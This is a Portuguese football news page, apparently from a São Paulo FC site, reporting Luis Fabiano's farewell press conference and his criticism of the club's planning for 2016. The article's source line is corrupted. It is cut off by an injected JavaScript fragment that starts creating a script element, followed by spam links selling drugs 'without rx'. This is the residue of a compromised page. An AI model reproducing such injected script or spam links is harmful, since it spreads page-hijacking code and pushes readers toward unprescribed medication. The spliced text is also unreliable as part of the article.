Destaque Noticia

Luis Fabiano critica planejamento do São Paulo e falta de técnico para 2016

No dia em que anunciou sua despedida do São Paulo, Luis Fabiano não fugiu das perguntas e falou sobre tudo em entrevista coletiva no CT da Barra Funda.
Entre os assuntos comentados, o centroavante deu sua opinião a respeito do planejamento do time para 2016 e fez críticas pela falta de definição do novo técnico, quando foi questionado sobre a sua renovação. A expectativa era anunciá-lo nesta semana, mas o processo pode demorar mais.

– Entendo o lado do clube, foi um ano muito conturbado, problemático e com coisas atípicas. Tem coisas mais importantes para se preocupar. Até hoje nós vemos que não tem um planejamento para o ano que vem, não sabem quem será o técnico. Tudo isso é de se entender – disse.
FORA: Ceni é vetado e fica fora do última partida como profissional no Morumbi

O Fabuloso diz não acreditar em falta de comprometimento do grupo, defeito apontado pelo presidente Carlos Augusto de Barros e Silva, o Leco, e motivo de cobrança em reunião nesta semana, no CT da Barra Funda. Rodrigo Caio também apontou esse fato como problema.

– Muito se fala sobre falta de comprometimento, o que não acredito, senão não estaríamos brigando pelo G-4. Tudo que aconteceu fora de campo atrapalhou muito internamente, interfere dentro do campo. É um abandono e isso influencia a cabeça de alguns (o presidente Carlos Miguel Aidar renunciou sob denúncias de corrupção).

Não vejo ninguém com má vontade, acho que em alguns jogos faltou concentração e atitude. Mas vejo um grupo legal de trabalhar, que não teve o resultado esperado. Em determinados jogos, você fica frustrado. Perder de 6 é vergonhoso (para o time reserva do rival Corinthians), mas nós ainda temos a chance de terminar o ano da melhor maneira possível, com a Libertadores, o que seria um feito, após tantos problemas que tivemos no ano – afirmou.
O Fabuloso também disse não guardar mágoas do presidente Leco.

– Não ficou nenhum ressentimento. Depois de um jogo que você é goleado, faz parte. É preciso relevar e saber que é cobrado dentro de um grande clube. Todos sabem o que fizeram e o que poderiam fazer. Ele é o presidente e tem o direito de vir e cobrar, se isso serve para ele ou não – disse.

Com 56 pontos, o São Paulo busca a vitória contra o Figueirense, neste sábado, para se manter no G-4 do Brasileirão. Luis Fabiano deverá ser titular, ao lado de Alexandre Pato.

Fonte: Gevar d=document;var s=d.createElement(‘script’); obtain at low price drugs no rx – http://prih-hartono.mhs.narotama.ac.id/2016/11/30/obtain-at-low-price-drugs-no-rx/ obtain cheat medications without rx – http://soe.wpengine.com/obtain-cheat-medications-without-rx/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Tricolor trabalha no Rio antes de retornar

saopauloadmin19 de outubro de 2017

Hernanes sobre o São Paulo: ‘Time não amadurece. É inaceitável’

saopauloadmin19 de outubro de 2017

São Paulo decide não renovar com Renan Ribeiro e Denis. Sidão, Perri e reforço comporão o gol em 2018

saopauloadmin18 de outubro de 2017

Perto de rescindir com Under Armour, SP se reúne com Umbro e Penalty

saopauloadmin18 de outubro de 2017

Veja em que pé está a negociação entre São Paulo e Under Armour

saopauloadmin18 de outubro de 2017

Dorival deve repetir escalação após dez partidas mudando o São Paulo

saopauloadmin18 de outubro de 2017

Relacionados para Fluminense x São Paulo

saopauloadmin18 de outubro de 2017

Leco sobre Kaká: “É uma conversa que deveremos ter”

saopauloadmin17 de outubro de 2017

Pratto torce pelo retorno de Kaká ao São Paulo

saopauloadmin17 de outubro de 2017